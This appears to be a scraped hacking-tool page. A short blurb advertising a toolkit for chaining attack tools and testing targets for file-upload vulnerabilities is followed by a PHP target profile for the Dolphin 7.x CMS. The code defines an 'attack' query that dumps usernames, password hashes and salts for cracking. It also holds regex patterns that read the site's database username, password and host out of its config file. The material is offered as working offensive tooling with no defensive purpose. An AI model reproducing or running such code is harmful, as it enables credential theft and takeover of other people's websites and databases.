..I will show you how to make a multi bridge between THC_DO, THC_SS and THC_II and keep track of the output in realtime using iframes. So what exactly are we going to do? First of all..
Mister LG can create upload forms and test targets on file upload vulnerabilities
<?php
/* Dolphin */
$_PROPERTIES = array();
$_PROPERTIES['name'] = "Dolphin";
$_PROPERTIES['version'] = "7.x";
$_PROPERTIES['usernamefield'] = "NickName";
$_PROPERTIES['emailfield'] = "Email";
$_PROPERTIES['saltfield'] = "Salt";
$_PROPERTIES['hashfield'] = "Password";
$_PROPERTIES['tablename'] = "profiles";
$_PROPERTIES['tableprefix'] = "";
$_PROPERTIES['filename'] = "dolphin/dolphina.php";
// use post variables instead if values are different from default
if(isset($_POST['iUseDefault']) && $_POST['iUseDefault']==0){
$_PROPERTIES['usernamefield'] = @mysql_real_escape_string($_POST['sUserNameField']);
$_PROPERTIES['emailfield'] = @mysql_real_escape_string($_POST['sEmailField']);
$_PROPERTIES['hashfield'] = @mysql_real_escape_string($_POST['sHashField']);
$_PROPERTIES['tablename'] = @mysql_real_escape_string($_POST['sTableName']);
$_PROPERTIES['tableprefix'] = @mysql_real_escape_string($_POST['sTablePrefix']);
}
$_PROPERTIES['queryraw'] = array();
$_PROPERTIES['queryraw']['attack'] = "SELECT ".$_PROPERTIES['usernamefield']." AS crackuser,".$_PROPERTIES['hashfield']." AS crackpass".(isset($_PROPERTIES['saltfield']) ? ",".$_PROPERTIES['saltfield']." AS crackhash" : "")." FROM ".$_PROPERTIES['tableprefix'].$_PROPERTIES['tablename'];
$_PROPERTIES['queryraw']['getemail'] = "SELECT ".$_PROPERTIES['emailfield']." AS temail FROM ".$_PROPERTIES['tableprefix'].$_PROPERTIES['tablename']." WHERE ".$_PROPERTIES['usernamefield']."='/user/'";
if(isset($_GET['JSON'])){
session_cache_limiter('nocache');
header('Expires: '.gmdate('r',0));
header('Content-type: application/json');
echo json_encode($_PROPERTIES);
}
$_SYSTEM = array();
$_SYSTEM['name'] = $_PROPERTIES['name'];
$_SYSTEM['version'] = $_PROPERTIES['version'];
$_SYSTEM['patterns'] = array();
$_SYSTEM['patterns']['user'] = '/\$db\[\'user\']\s+=\s+\'(.*)?\'/';
$_SYSTEM['patterns']['password'] = '/\$db\[\'passwd\']\s+=\s+\'(.*)?\'/';
$_SYSTEM['patterns']['host'] = '/\$db\[\'host\']\s+=\s+\'(.*)?\'/';
$_SYSTEM['patterns']['database'] = '/\$db\[\'db\']\s+=\s+\'(.*)?\'/';
$_SYSTEM['file'] = "inc/header.inc.php";
?>